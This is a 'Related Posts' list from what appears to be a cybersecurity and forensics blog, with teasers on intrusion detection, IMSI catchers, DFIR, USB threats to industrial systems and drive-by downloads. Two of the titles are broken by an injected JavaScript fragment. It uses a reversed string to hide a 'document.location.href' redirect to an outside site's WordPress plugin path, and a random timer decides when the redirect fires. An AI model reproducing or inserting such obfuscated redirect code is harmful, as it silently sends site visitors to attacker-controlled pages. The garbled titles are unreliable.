Related Posts

Intrusion Detection systems
An intrusion detection system (IDS) is a device or software application that monitors network or system activities for malicious... read more
Android – Mobile Forensics testing hardware and software
Android Hardware • Exemplar phone 0: Techno Y3 – Rooted – OS 8.1.0 • Emulators – Genymotion, SDK Manager, and Nox Imaging Software • Magnet Acquire... read more
What is an IMSI catcher?
An IMSI catcher – also known as a cell-site simulator, fake cell tower, rogue base station, StingRay or dirtbox,... read more
DFIR Briefly Expained – Part 2
Before we begin with learning how to collect digital evidence we first need to talk about “scope.” Scoping is... read more
DFIR Briefly Expained – Part 1
Since we are going to be learning in future blog posts the specifics of Digital Forensics & Incident Response... read more
Report: USB threats toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ICS systems have nearly doubled
The latest Honeywell USB Threat Report 2020 indicates that the number of threats specifically targeting Operational Technology systems has... read more
Full disk encryption: do we need it?
Companies should consider implementing full disk encryption alongside other encryption methods on mobile devices.Companies should consider implementing full disk... read more
Drive-by downloads – the biggest threat
The European Network and Information Security Agency (ENISA) has identified drive-by downloads as the number one threat in the... read more
Cybersecurity Ethics: Establishing a Code for Your SOC
Since security intersects so much with privacy, cybersecurity ethics decisions should be on your mind at work. Being part of a... read more
Biggest threats toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ICS/SCADA systems
Introduction Imagine a scenario where two nations are at war. One nation has the capability to attack the other’s industrial... read more
Leave a Reply